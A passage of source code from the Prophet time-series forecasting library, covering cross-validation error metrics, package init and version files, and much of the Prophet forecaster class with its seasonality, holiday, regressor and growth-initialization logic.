res_x}) # The functions below specify performance metrics for cross-validation results. # Each takes as input the output of cross_validation, and returns the statistic # as a dataframe, given a window size for rolling aggregation. def mse(df, w): """Mean squared error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mse. """ se = (df['y'] - df['yhat']) ** 2 if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mse': se}) return rolling_mean_by_h( x=se.values, h=df['horizon'].values, w=w, name='mse' ) def rmse(df, w): """Root mean squared error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and rmse. """ res = mse(df, w) res['mse'] = np.sqrt(res['mse']) res.rename({'mse': 'rmse'}, axis='columns', inplace=True) return res def mae(df, w): """Mean absolute error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mae. """ ae = np.abs(df['y'] - df['yhat']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mae': ae}) return rolling_mean_by_h( x=ae.values, h=df['horizon'].values, w=w, name='mae' ) def mape(df, w): """Mean absolute percent error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mape. """ ape = np.abs((df['y'] - df['yhat']) / df['y']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mape': ape}) return rolling_mean_by_h( x=ape.values, h=df['horizon'].values, w=w, name='mape' ) def mdape(df, w): """Median absolute percent error Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and mdape. """ ape = np.abs((df['y'] - df['yhat']) / df['y']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'mdape': ape}) return rolling_median_by_h( x=ape.values, h=df['horizon'], w=w, name='mdape' ) def smape(df, w): """Symmetric mean absolute percentage error based on Chen and Yang (2004) formula Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and smape. """ sape = np.abs(df['y'] - df['yhat']) / ((np.abs(df['y']) + np.abs(df['yhat'])) / 2) sape = sape.fillna(0) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'smape': sape}) return rolling_mean_by_h( x=sape.values, h=df['horizon'].values, w=w, name='smape' ) def coverage(df, w): """Coverage Parameters ---------- df: Cross-validation results dataframe. w: Aggregation window size. Returns ------- Dataframe with columns horizon and coverage. """ is_covered = (df['y'] >= df['yhat_lower']) & (df['y'] <= df['yhat_upper']) if w < 0: return pd.DataFrame({'horizon': df['horizon'], 'coverage': is_covered}) return rolling_mean_by_h( x=is_covered.values, h=df['horizon'].values, w=w, name='coverage' ) File: python/prophet/__init__.py # Copyright (c) 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. An additional grant # of patent rights can be found in the PATENTS file in the same directory. from prophet.forecaster import Prophet from pathlib import Path about = {} here = Path(__file__).parent.resolve() with open(here / "__version__.py", "r") as f: exec(f.read(), about) __version__ = about["__version__"] File: python/prophet/__version__.py __version__ = "1.1.5" File: python/prophet/forecaster.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import dataclasses import logging from collections import OrderedDict, defaultdict from copy import deepcopy from datetime import timedelta from typing import Dict, List, Union import numpy as np import pandas as pd from numpy.typing import NDArray from prophet.make_holidays import get_holiday_names, make_holidays_df from prophet.models import StanBackendEnum, ModelInputData, ModelParams, TrendIndicator from prophet.plot import (plot, plot_components) logger = logging.getLogger('prophet') logger.setLevel(logging.INFO) NANOSECONDS_TO_SECONDS = 1000 * 1000 * 1000 class Prophet(object): """Prophet forecaster. Parameters ---------- growth: String 'linear', 'logistic' or 'flat' to specify a linear, logistic or flat trend. changepoints: List of dates at which to include potential changepoints. If not specified, potential changepoints are selected automatically. n_changepoints: Number of potential changepoints to include. Not used if input `changepoints` is supplied. If `changepoints` is not supplied, then n_changepoints potential changepoints are selected uniformly from the first `changepoint_range` proportion of the history. changepoint_range: Proportion of history in which trend changepoints will be estimated. Defaults to 0.8 for the first 80%. Not used if `changepoints` is specified. yearly_seasonality: Fit yearly seasonality. Can be 'auto', True, False, or a number of Fourier terms to generate. weekly_seasonality: Fit weekly seasonality. Can be 'auto', True, False, or a number of Fourier terms to generate. daily_seasonality: Fit daily seasonality. Can be 'auto', True, False, or a number of Fourier terms to generate. holidays: pd.DataFrame with columns holiday (string) and ds (date type) and optionally columns lower_window and upper_window which specify a range of days around the date to be included as holidays. lower_window=-2 will include 2 days prior to the date as holidays. Also optionally can have a column prior_scale specifying the prior scale for that holiday. seasonality_mode: 'additive' (default) or 'multiplicative'. seasonality_prior_scale: Parameter modulating the strength of the seasonality model. Larger values allow the model to fit larger seasonal fluctuations, smaller values dampen the seasonality. Can be specified for individual seasonalities using add_seasonality. holidays_prior_scale: Parameter modulating the strength of the holiday components model, unless overridden in the holidays input. changepoint_prior_scale: Parameter modulating the flexibility of the automatic changepoint selection. Large values will allow many changepoints, small values will allow few changepoints. mcmc_samples: Integer, if greater than 0, will do full Bayesian inference with the specified number of MCMC samples. If 0, will do MAP estimation. interval_width: Float, width of the uncertainty intervals provided for the forecast. If mcmc_samples=0, this will be only the uncertainty in the trend using the MAP estimate of the extrapolated generative model. If mcmc.samples>0, this will be integrated over all model parameters, which will include uncertainty in seasonality. uncertainty_samples: Number of simulated draws used to estimate uncertainty intervals. Settings this value to 0 or False will disable uncertainty estimation and speed up the calculation. stan_backend: str as defined in StanBackendEnum default: None - will try to iterate over all available backends and find the working one holidays_mode: 'additive' or 'multiplicative'. Defaults to seasonality_mode. """ def __init__( self, growth='linear', changepoints=None, n_changepoints=25, changepoint_range=0.8, yearly_seasonality='auto', weekly_seasonality='auto', daily_seasonality='auto', holidays=None, seasonality_mode='additive', seasonality_prior_scale=10.0, holidays_prior_scale=10.0, changepoint_prior_scale=0.05, mcmc_samples=0, interval_width=0.80, uncertainty_samples=1000, stan_backend=None, scaling: str = 'absmax', holidays_mode=None, ): self.growth = growth self.changepoints = changepoints if self.changepoints is not None: self.changepoints = pd.Series(pd.to_datetime(self.changepoints), name='ds') self.n_changepoints = len(self.changepoints) self.specified_changepoints = True else: self.n_changepoints = n_changepoints self.specified_changepoints = False self.changepoint_range = changepoint_range self.yearly_seasonality = yearly_seasonality self.weekly_seasonality = weekly_seasonality self.daily_seasonality = daily_seasonality self.holidays = holidays self.seasonality_mode = seasonality_mode self.holidays_mode = holidays_mode if holidays_mode is None: self.holidays_mode = self.seasonality_mode self.seasonality_prior_scale = float(seasonality_prior_scale) self.changepoint_prior_scale = float(changepoint_prior_scale) self.holidays_prior_scale = float(holidays_prior_scale) self.mcmc_samples = mcmc_samples self.interval_width = interval_width self.uncertainty_samples = uncertainty_samples if scaling not in ("absmax", "minmax"): raise ValueError("scaling must be one of 'absmax' or 'minmax'") self.scaling = scaling # Set during fitting or by other methods self.start = None self.y_min = None self.y_scale = None self.logistic_floor = False self.t_scale = None self.changepoints_t = None self.seasonalities = OrderedDict({}) self.extra_regressors = OrderedDict({}) self.country_holidays = None self.stan_fit = None self.params = {} self.history = None self.history_dates = None self.train_component_cols = None self.component_modes = None self.train_holiday_names = None self.fit_kwargs = {} self.validate_inputs() self._load_stan_backend(stan_backend) def _load_stan_backend(self, stan_backend): if stan_backend is None: for i in StanBackendEnum: try: logger.debug("Trying to load backend: %s", i.name) return self._load_stan_backend(i.name) except Exception as e: logger.debug("Unable to load backend %s (%s), trying the next one", i.name, e) else: self.stan_backend = StanBackendEnum.get_backend_class(stan_backend)() logger.debug("Loaded stan backend: %s", self.stan_backend.get_type()) def validate_inputs(self): """Validates the inputs to Prophet.""" if self.growth not in ('linear', 'logistic', 'flat'): raise ValueError( 'Parameter "growth" should be "linear", "logistic" or "flat".') if not isinstance(self.changepoint_range, (int, float)): raise ValueError("changepoint_range must be a number in [0, 1]'") if ((self.changepoint_range < 0) or (self.changepoint_range > 1)): raise ValueError('Parameter "changepoint_range" must be in [0, 1]') if self.holidays is not None: if not ( isinstance(self.holidays, pd.DataFrame) and 'ds' in self.holidays # noqa W503 and 'holiday' in self.holidays # noqa W503 ): raise ValueError('holidays must be a DataFrame with "ds" and ' '"holiday" columns.') self.holidays['ds'] = pd.to_datetime(self.holidays['ds']) if ( self.holidays['ds'].isnull().any() or self.holidays['holiday'].isnull().any() ): raise ValueError('Found a NaN in holidays dataframe.') has_lower = 'lower_window' in self.holidays has_upper = 'upper_window' in self.holidays if has_lower + has_upper == 1: raise ValueError('Holidays must have both lower_window and ' + 'upper_window, or neither') if has_lower: if self.holidays['lower_window'].max() > 0: raise ValueError('Holiday lower_window should be <= 0') if self.holidays['upper_window'].min() < 0: raise ValueError('Holiday upper_window should be >= 0') for h in self.holidays['holiday'].unique(): self.validate_column_name(h, check_holidays=False) if self.seasonality_mode not in ['additive', 'multiplicative']: raise ValueError( 'seasonality_mode must be "additive" or "multiplicative"' ) if self.holidays_mode not in ['additive', 'multiplicative']: raise ValueError( 'holidays_mode must be "additive" or "multiplicative"' ) def validate_column_name(self, name, check_holidays=True, check_seasonalities=True, check_regressors=True): """Validates the name of a seasonality, holiday, or regressor. Parameters ---------- name: string check_holidays: bool check if name already used for holiday check_seasonalities: bool check if name already used for seasonality check_regressors: bool check if name already used for regressor """ if '_delim_' in name: raise ValueError('Name cannot contain "_delim_"') reserved_names = [ 'trend', 'additive_terms', 'daily', 'weekly', 'yearly', 'holidays', 'zeros', 'extra_regressors_additive', 'yhat', 'extra_regressors_multiplicative', 'multiplicative_terms', ] rn_l = [n + '_lower' for n in reserved_names] rn_u = [n + '_upper' for n in reserved_names] reserved_names.extend(rn_l) reserved_names.extend(rn_u) reserved_names.extend([ 'ds', 'y', 'cap', 'floor', 'y_scaled', 'cap_scaled']) if name in reserved_names: raise ValueError( 'Name {name!r} is reserved.'.format(name=name) ) if (check_holidays and self.holidays is not None and name in self.holidays['holiday'].unique()): raise ValueError( 'Name {name!r} already used for a holiday.'.format(name=name) ) if (check_holidays and self.country_holidays is not None and name in get_holiday_names(self.country_holidays)): raise ValueError( 'Name {name!r} is a holiday name in {country_holidays}.' .format(name=name, country_holidays=self.country_holidays) ) if check_seasonalities and name in self.seasonalities: raise ValueError( 'Name {name!r} already used for a seasonality.' .format(name=name) ) if check_regressors and name in self.extra_regressors: raise ValueError( 'Name {name!r} already used for an added regressor.' .format(name=name) ) def setup_dataframe(self, df, initialize_scales=False): """Prepare dataframe for fitting or predicting. Adds a time index and scales y. Creates auxiliary columns 't', 't_ix', 'y_scaled', and 'cap_scaled'. These columns are used during both fitting and predicting. Parameters ---------- df: pd.DataFrame with columns ds, y, and cap if logistic growth. Any specified additional regressors must also be present. initialize_scales: Boolean set scaling factors in self from df. Returns ------- pd.DataFrame prepared for fitting or predicting. """ if 'y' in df: # 'y' will be in training data df['y'] = pd.to_numeric(df['y']) if np.isinf(df['y'].values).any(): raise ValueError('Found infinity in column y.') if df['ds'].dtype == np.int64: df['ds'] = df['ds'].astype(str) df['ds'] = pd.to_datetime(df['ds']) if df['ds'].dt.tz is not None: raise ValueError( 'Column ds has timezone specified, which is not supported. ' 'Remove timezone.' ) if df['ds'].isnull().any(): raise ValueError('Found NaN in column ds.') for name in self.extra_regressors: if name not in df: raise ValueError( 'Regressor {name!r} missing from dataframe' .format(name=name) ) df[name] = pd.to_numeric(df[name]) if df[name].isnull().any(): raise ValueError( 'Found NaN in column {name!r}'.format(name=name) ) for props in self.seasonalities.values(): condition_name = props['condition_name'] if condition_name is not None: if condition_name not in df: raise ValueError( 'Condition {condition_name!r} missing from dataframe' .format(condition_name=condition_name) ) if not df[condition_name].isin([True, False]).all(): raise ValueError( 'Found non-boolean in column {condition_name!r}' .format(condition_name=condition_name) ) df[condition_name] = df[condition_name].astype('bool') if df.index.name == 'ds': df.index.name = None df = df.sort_values('ds', kind='mergesort') df = df.reset_index(drop=True) self.initialize_scales(initialize_scales, df) if self.logistic_floor: if 'floor' not in df: raise ValueError('Expected column "floor".') else: if self.scaling == "absmax": df['floor'] = 0. elif self.scaling == "minmax": df['floor'] = self.y_min if self.growth == 'logistic': if 'cap' not in df: raise ValueError( 'Capacities must be supplied for logistic growth in ' 'column "cap"' ) if (df['cap'] <= df['floor']).any(): raise ValueError( 'cap must be greater than floor (which defaults to 0).' ) df['cap_scaled'] = (df['cap'] - df['floor']) / self.y_scale df['t'] = (df['ds'] - self.start) / self.t_scale if 'y' in df: df['y_scaled'] = (df['y'] - df['floor']) / self.y_scale for name, props in self.extra_regressors.items(): df[name] = ((df[name] - props['mu']) / props['std']) return df def initialize_scales(self, initialize_scales, df): """Initialize model scales. Sets model scaling factors using df. Parameters ---------- initialize_scales: Boolean set the scales or not. df: pd.DataFrame for setting scales. """ if not initialize_scales: return if self.growth == 'logistic' and 'floor' in df: self.logistic_floor = True if self.scaling == "absmax": self.y_min = float((df['y'] - df['floor']).abs().min()) self.y_scale = float((df['y'] - df['floor']).abs().max()) elif self.scaling == "minmax": self.y_min = df['floor'].min() self.y_scale = float(df['cap'].max() - self.y_min) else: if self.scaling == "absmax": self.y_min = 0. self.y_scale = float((df['y']).abs().max()) elif self.scaling == "minmax": self.y_min = df['y'].min() self.y_scale = float(df['y'].max() - self.y_min) if self.y_scale == 0: self.y_scale = 1.0 self.start = df['ds'].min() self.t_scale = df['ds'].max() - self.start for name, props in self.extra_regressors.items(): standardize = props['standardize'] n_vals = len(df[name].unique()) if n_vals < 2: standardize = False if standardize == 'auto': if set(df[name].unique()) == {1, 0}: standardize = False # Don't standardize binary variables. else: standardize = True if standardize: mu = float(df[name].mean()) std = float(df[name].std()) self.extra_regressors[name]['mu'] = mu self.extra_regressors[name]['std'] = std def set_changepoints(self): """Set changepoints Sets m$changepoints to the dates of changepoints. Either: 1) The changepoints were passed in explicitly. A) They are empty. B) They are not empty, and need validation. 2) We are generating a grid of them. 3) The user prefers no changepoints be used. """ if self.changepoints is not None: if len(self.changepoints) == 0: pass else: too_low = min(self.changepoints) < self.history['ds'].min() too_high = max(self.changepoints) > self.history['ds'].max() if too_low or too_high: raise ValueError( 'Changepoints must fall within training data.') else: # Place potential changepoints evenly through first # `changepoint_range` proportion of the history hist_size = int(np.floor(self.history.shape[0] * self.changepoint_range)) if self.n_changepoints + 1 > hist_size: self.n_changepoints = hist_size - 1 logger.info( 'n_changepoints greater than number of observations. ' 'Using {n_changepoints}.' .format(n_changepoints=self.n_changepoints) ) if self.n_changepoints > 0: cp_indexes = ( np.linspace(0, hist_size - 1, self.n_changepoints + 1) .round() .astype(int) ) self.changepoints = ( self.history.iloc[cp_indexes]['ds'].tail(-1) ) else: # set empty changepoints self.changepoints = pd.Series(pd.to_datetime([]), name='ds') if len(self.changepoints) > 0: self.changepoints_t = np.sort(np.array( (self.changepoints - self.start) / self.t_scale)) else: self.changepoints_t = np.array([0]) # dummy changepoint @staticmethod def fourier_series( dates: pd.Series, period: Union[int, float], series_order: int, ) -> NDArray[np.float_]: """Provides Fourier series components with the specified frequency and order. Parameters ---------- dates: pd.Series containing timestamps. period: Number of days of the period. series_order: Number of components. Returns ------- Matrix with seasonality features. """ if not (series_order >= 1): raise ValueError("series_order must be >= 1") # convert to days since epoch t = dates.to_numpy(dtype=np.int64) // NANOSECONDS_TO_SECONDS / (3600 * 24.) x_T = t * np.pi * 2 fourier_components = np.empty((dates.shape[0], 2 * series_order)) for i in range(series_order): c = x_T * (i + 1) / period fourier_components[:, 2 * i] = np.sin(c) fourier_components[:, (2 * i) + 1] = np.cos(c) return fourier_components @classmethod def make_seasonality_features(cls, dates, period, series_order, prefix): """Data frame with seasonality features. Parameters ---------- cls: Prophet class. dates: pd.Series containing timestamps. period: Number of days of the period. series_order: Number of components. prefix: Column name prefix. Returns ------- pd.DataFrame with seasonality features. """ features = cls.fourier_series(dates, period, series_order) columns = [ '{}_delim_{}'.format(prefix, i + 1) for i in range(features.shape[1]) ] return pd.DataFrame(features, columns=columns) def construct_holiday_dataframe(self, dates): """Construct a dataframe of holiday dates. Will combine self.holidays with the built-in country holidays corresponding to input dates, if self.country_holidays is set. Parameters ---------- dates: pd.Series containing timestamps used for computing seasonality. Returns ------- dataframe of holiday dates, in holiday dataframe format used in initialization. """ all_holidays = pd.DataFrame() if self.holidays is not None: all_holidays = self.holidays.copy() if self.country_holidays is not None: year_list = list({x.year for x in dates}) country_holidays_df = make_holidays_df( year_list=year_list, country=self.country_holidays ) all_holidays = pd.concat((all_holidays, country_holidays_df), sort=False) all_holidays.reset_index(drop=True, inplace=True) # Drop future holidays not previously seen in training data if self.train_holiday_names is not None: # Remove holiday names didn't show up in fit index_to_drop = all_holidays.index[ np.logical_not( all_holidays.holiday.isin(self.train_holiday_names) ) ] all_holidays = all_holidays.drop(index_to_drop) # Add holiday names in fit but not in predict with ds as NA holidays_to_add = pd.DataFrame({ 'holiday': self.train_holiday_names[ np.logical_not(self.train_holiday_names .isin(all_holidays.holiday)) ] }) all_holidays = pd.concat((all_holidays, holidays_to_add), sort=False) all_holidays.reset_index(drop=True, inplace=True) return all_holidays def make_holiday_features(self, dates, holidays): """Construct a dataframe of holiday features. Parameters ---------- dates: pd.Series containing timestamps used for computing seasonality. holidays: pd.Dataframe containing holidays, as returned by construct_holiday_dataframe. Returns ------- holiday_features: pd.DataFrame with a column for each holiday. prior_scale_list: List of prior scales for each holiday column. holiday_names: List of names of holidays """ # Holds columns of our future matrix. expanded_holidays = defaultdict(lambda: np.zeros(dates.shape[0])) prior_scales = {} # Makes an index so we can perform `get_loc` below. # Strip to just dates. row_index = pd.DatetimeIndex(dates.dt.date) for row in holidays.itertuples(): dt = row.ds.date() try: lw = int(getattr(row, 'lower_window', 0)) uw = int(getattr(row, 'upper_window', 0)) except ValueError: lw = 0 uw = 0 ps = float(getattr(row, 'prior_scale', self.holidays_prior_scale)) if np.isnan(ps): ps = float(self.holidays_prior_scale) if row.holiday in prior_scales and prior_scales[row.holiday] != ps: raise ValueError( 'Holiday {holiday!r} does not have consistent prior ' 'scale specification.'.format(holiday=row.holiday) ) if ps <= 0: raise ValueError('Prior scale must be > 0') prior_scales[row.holiday] = ps for offset in range(lw, uw + 1): occurrence = pd.to_datetime(dt + timedelta(days=offset)) try: loc = row_index.get_loc(occurrence) except KeyError: loc = None key = '{}_delim_{}{}'.format( row.holiday, '+' if offset >= 0 else '-', abs(offset) ) if loc is not None: expanded_holidays[key][loc] = 1. else: expanded_holidays[key] # Access key to generate value holiday_features = pd.DataFrame(expanded_holidays) # Make sure column order is consistent holiday_features = holiday_features[sorted(holiday_features.columns .tolist())] prior_scale_list = [ prior_scales[h.split('_delim_')[0]] for h in holiday_features.columns ] holiday_names = list(prior_scales.keys()) # Store holiday names used in fit if self.train_holiday_names is None: self.train_holiday_names = pd.Series(holiday_names) return holiday_features, prior_scale_list, holiday_names def add_regressor(self, name, prior_scale=None, standardize='auto', mode=None): """Add an additional regressor to be used for fitting and predicting. The dataframe passed to `fit` and `predict` will have a column with the specified name to be used as a regressor. When standardize='auto', the regressor will be standardized unless it is binary. The regression coefficient is given a prior with the specified scale parameter. Decreasing the prior scale will add additional regularization. If no prior scale is provided, self.holidays_prior_scale will be used. Mode can be specified as either 'additive' or 'multiplicative'. If not specified, self.seasonality_mode will be used. 'additive' means the effect of the regressor will be added to the trend, 'multiplicative' means it will multiply the trend. Parameters ---------- name: string name of the regressor. prior_scale: optional float scale for the normal prior. If not provided, self.holidays_prior_scale will be used. standardize: optional, specify whether this regressor will be standardized prior to fitting. Can be 'auto' (standardize if not binary), True, or False. mode: optional, 'additive' or 'multiplicative'. Defaults to self.seasonality_mode. Returns ------- The prophet object. """ if self.history is not None: raise Exception( "Regressors must be added prior to model fitting.") self.validate_column_name(name, check_regressors=False) if prior_scale is None: prior_scale = float(self.holidays_prior_scale) if mode is None: mode = self.seasonality_mode if prior_scale <= 0: raise ValueError('Prior scale must be > 0') if mode not in ['additive', 'multiplicative']: raise ValueError("mode must be 'additive' or 'multiplicative'") self.extra_regressors[name] = { 'prior_scale': prior_scale, 'standardize': standardize, 'mu': 0., 'std': 1., 'mode': mode, } return self def add_seasonality(self, name, period, fourier_order, prior_scale=None, mode=None, condition_name=None): """Add a seasonal component with specified period, number of Fourier components, and prior scale. Increasing the number of Fourier components allows the seasonality to change more quickly (at risk of overfitting). Default values for yearly and weekly seasonalities are 10 and 3 respectively. Increasing prior scale will allow this seasonality component more flexibility, decreasing will dampen it. If not provided, will use the seasonality_prior_scale provided on Prophet initialization (defaults to 10). Mode can be specified as either 'additive' or 'multiplicative'. If not specified, self.seasonality_mode will be used (defaults to additive). Additive means the seasonality will be added to the trend, multiplicative means it will multiply the trend. If condition_name is provided, the dataframe passed to `fit` and `predict` should have a column with the specified condition_name containing booleans which decides when to apply seasonality. Parameters ---------- name: string name of the seasonality component. period: float number of days in one period. fourier_order: int number of Fourier components to use. prior_scale: optional float prior scale for this component. mode: optional 'additive' or 'multiplicative' condition_name: string name of the seasonality condition. Returns ------- The prophet object. """ if self.history is not None: raise Exception( 'Seasonality must be added prior to model fitting.') if name not in ['daily', 'weekly', 'yearly']: # Allow overwriting built-in seasonalities self.validate_column_name(name, check_seasonalities=False) if prior_scale is None: ps = self.seasonality_prior_scale else: ps = float(prior_scale) if ps <= 0: raise ValueError('Prior scale must be > 0') if fourier_order <= 0: raise ValueError('Fourier Order must be > 0') if mode is None: mode = self.seasonality_mode if mode not in ['additive', 'multiplicative']: raise ValueError('mode must be "additive" or "multiplicative"') if condition_name is not None: self.validate_column_name(condition_name) self.seasonalities[name] = { 'period': period, 'fourier_order': fourier_order, 'prior_scale': ps, 'mode': mode, 'condition_name': condition_name, } return self def add_country_holidays(self, country_name): """Add in built-in holidays for the specified country. These holidays will be included in addition to any specified on model initialization. Holidays will be calculated for arbitrary date ranges in the history and future. See the online documentation for the list of countries with built-in holidays. Built-in country holidays can only be set for a single country. Parameters ---------- country_name: Name of the country, like 'UnitedStates' or 'US' Returns ------- The prophet object. """ if self.history is not None: raise Exception( "Country holidays must be added prior to model fitting." ) # Validate names. for name in get_holiday_names(country_name): # Allow merging with existing holidays self.validate_column_name(name, check_holidays=False) # Set the holidays. if self.country_holidays is not None: logger.warning( 'Changing country holidays from {country_holidays!r} to ' '{country_name!r}.' .format( country_holidays=self.country_holidays, country_name=country_name, ) ) self.country_holidays = country_name return self def make_all_seasonality_features(self, df): """Dataframe with seasonality features. Includes seasonality features, holiday features, and added regressors. Parameters ---------- df: pd.DataFrame with dates for computing seasonality features and any added regressors. Returns ------- pd.DataFrame with regression features. list of prior scales for each column of the features dataframe. Dataframe with indicators for which regression components correspond to which columns. Dictionary with keys 'additive' and 'multiplicative' listing the component names for each mode of seasonality. """ seasonal_features = [] prior_scales = [] modes = {'additive': [], 'multiplicative': []} # Seasonality features for name, props in self.seasonalities.items(): features = self.make_seasonality_features( df['ds'], props['period'], props['fourier_order'], name, ) if props['condition_name'] is not None: features[~df[props['condition_name']]] = 0 seasonal_features.append(features) prior_scales.extend( [props['prior_scale']] * features.shape[1]) modes[props['mode']].append(name) # Holiday features holidays = self.construct_holiday_dataframe(df['ds']) if len(holidays) > 0: features, holiday_priors, holiday_names = ( self.make_holiday_features(df['ds'], holidays) ) seasonal_features.append(features) prior_scales.extend(holiday_priors) modes[self.holidays_mode].extend(holiday_names) # Additional regressors for name, props in self.extra_regressors.items(): seasonal_features.append(pd.DataFrame(df[name])) prior_scales.append(props['prior_scale']) modes[props['mode']].append(name) # Dummy to prevent empty X if len(seasonal_features) == 0: seasonal_features.append( pd.DataFrame({'zeros': np.zeros(df.shape[0])})) prior_scales.append(1.) seasonal_features = pd.concat(seasonal_features, axis=1) component_cols, modes = self.regressor_column_matrix( seasonal_features, modes ) return seasonal_features, prior_scales, component_cols, modes def regressor_column_matrix(self, seasonal_features, modes): """Dataframe indicating which columns of the feature matrix correspond to which seasonality/regressor components. Includes combination components, like 'additive_terms'. These combination components will be added to the 'modes' input. Parameters ---------- seasonal_features: Constructed seasonal features dataframe modes: Dictionary with keys 'additive' and 'multiplicative' listing the component names for each mode of seasonality. Returns ------- component_cols: A binary indicator dataframe with columns seasonal components and rows columns in seasonal_features. Entry is 1 if that columns is used in that component. modes: Updated input with combination components. """ components = pd.DataFrame({ 'col': np.arange(seasonal_features.shape[1]), 'component': [ x.split('_delim_')[0] for x in seasonal_features.columns ], }) # Add total for holidays if self.train_holiday_names is not None: components = self.add_group_component( components, 'holidays', self.train_holiday_names.unique()) # Add totals additive and multiplicative components, and regressors for mode in ['additive', 'multiplicative']: components = self.add_group_component( components, mode + '_terms', modes[mode] ) regressors_by_mode = [ r for r, props in self.extra_regressors.items() if props['mode'] == mode ] components = self.add_group_component( components, 'extra_regressors_' + mode, regressors_by_mode) # Add combination components to modes modes[mode].append(mode + '_terms') modes[mode].append('extra_regressors_' + mode) # After all of the additive/multiplicative groups have been added, modes[self.holidays_mode].append('holidays') # Convert to a binary matrix component_cols = pd.crosstab( components['col'], components['component'], ).sort_index(level='col') # Add columns for additive and multiplicative terms, if missing for name in ['additive_terms', 'multiplicative_terms']: if name not in component_cols: component_cols[name] = 0 # Remove the placeholder component_cols.drop('zeros', axis=1, inplace=True, errors='ignore') # Validation if (max(component_cols['additive_terms'] + component_cols['multiplicative_terms']) > 1): raise Exception('A bug occurred in seasonal components.') # Compare to the training, if set. if self.train_component_cols is not None: component_cols = component_cols[self.train_component_cols.columns] if not component_cols.equals(self.train_component_cols): raise Exception('A bug occurred in constructing regressors.') return component_cols, modes def add_group_component(self, components, name, group): """Adds a component with given name that contains all of the components in group. Parameters ---------- components: Dataframe with components. name: Name of new group component. group: List of components that form the group. Returns ------- Dataframe with components. """ new_comp = components[components['component'].isin(set(group))].copy() group_cols = new_comp['col'].unique() if len(group_cols) > 0: new_comp = pd.DataFrame({'col': group_cols, 'component': name}) components = pd.concat([components, new_comp]) return components def parse_seasonality_args(self, name, arg, auto_disable, default_order): """Get number of fourier components for built-in seasonalities. Parameters ---------- name: string name of the seasonality component. arg: 'auto', True, False, or number of fourier components as provided. auto_disable: bool if seasonality should be disabled when 'auto'. default_order: int default fourier order Returns ------- Number of fourier components, or 0 for disabled. """ if arg == 'auto': fourier_order = 0 if name in self.seasonalities: logger.info( 'Found custom seasonality named {name!r}, disabling ' 'built-in {name!r} seasonality.'.format(name=name) ) elif auto_disable: logger.info( 'Disabling {name} seasonality. Run prophet with ' '{name}_seasonality=True to override this.' .format(name=name) ) else: fourier_order = default_order elif arg is True: fourier_order = default_order elif arg is False: fourier_order = 0 else: fourier_order = int(arg) return fourier_order def set_auto_seasonalities(self): """Set seasonalities that were left on auto. Turns on yearly seasonality if there is >=2 years of history. Turns on weekly seasonality if there is >=2 weeks of history, and the spacing between dates in the history is <7 days. Turns on daily seasonality if there is >=2 days of history, and the spacing between dates in the history is <1 day. """ first = self.history['ds'].min() last = self.history['ds'].max() dt = self.history['ds'].diff() min_dt = dt.iloc[dt.values.nonzero()[0]].min() # Yearly seasonality yearly_disable = last - first < pd.Timedelta(days=730) fourier_order = self.parse_seasonality_args( 'yearly', self.yearly_seasonality, yearly_disable, 10) if fourier_order > 0: self.seasonalities['yearly'] = { 'period': 365.25, 'fourier_order': fourier_order, 'prior_scale': self.seasonality_prior_scale, 'mode': self.seasonality_mode, 'condition_name': None } # Weekly seasonality weekly_disable = ((last - first < pd.Timedelta(weeks=2)) or (min_dt >= pd.Timedelta(weeks=1))) fourier_order = self.parse_seasonality_args( 'weekly', self.weekly_seasonality, weekly_disable, 3) if fourier_order > 0: self.seasonalities['weekly'] = { 'period': 7, 'fourier_order': fourier_order, 'prior_scale': self.seasonality_prior_scale, 'mode': self.seasonality_mode, 'condition_name': None } # Daily seasonality daily_disable = ((last - first < pd.Timedelta(days=2)) or (min_dt >= pd.Timedelta(days=1))) fourier_order = self.parse_seasonality_args( 'daily', self.daily_seasonality, daily_disable, 4) if fourier_order > 0: self.seasonalities['daily'] = { 'period': 1, 'fourier_order': fourier_order, 'prior_scale': self.seasonality_prior_scale, 'mode': self.seasonality_mode, 'condition_name': None } @staticmethod def linear_growth_init(df): """Initialize linear growth. Provides a strong initialization for linear growth by calculating the growth and offset parameters that pass the function through the first and last points in the time series. Parameters ---------- df: pd.DataFrame with columns ds (date), y_scaled (scaled time series), and t (scaled time). Returns ------- A tuple (k, m) with the rate (k) and offset (m) of the linear growth function. """ i0, i1 = df['ds'].idxmin(), df['ds'].idxmax() T = df['t'].iloc[i1] - df['t'].iloc[i0] k = (df['y_scaled'].iloc[i1] - df['y_scaled'].iloc[i0]) / T m = df['y_scaled'].iloc[i0] - k * df['t'].iloc[i0] return (k, m) @staticmethod def logistic_growth_init(df): """Initialize logistic growth. Provides a strong initialization for logistic growth by calculating the growth and offset parameters that pass the function through the first and last points in the time series. Parameters ---------- df: pd.DataFrame with columns ds (date), cap_scaled (scaled capacity), y_scaled (scaled time series), and t (scaled time). Returns ------- A tuple (k, m) with the rate (k) and offset (m) of the logistic growth function. """ i0, i1 = df['ds'].idxmin(), df['ds'].idxmax() T = df['t'].iloc[i1] - df['t'].iloc[i0] # Force valid values, in case y > cap or y < 0 C0 = df['cap_scaled'].iloc[i0] C1 = df['cap_scaled'].iloc[i1] y0 = max(0.01 * C0, min(0.99 * C0, df['y_scaled'].iloc[i0])) y1 = max(0.01 * C1, min(0.99 * C1, df['y_scaled'].iloc[i1])) r0 = C0 / y0 r1 = C1 / y1 if abs(r0 - r1) <= 0.01: r0 = 1.05 * r0 L0 = np.log(r0 - 1) L1 = np.log(r1 - 1) # Initialize the offset m = L0 * T / (L0 - L1) # And the rate k = (L0 - L1) / T return (k, m) 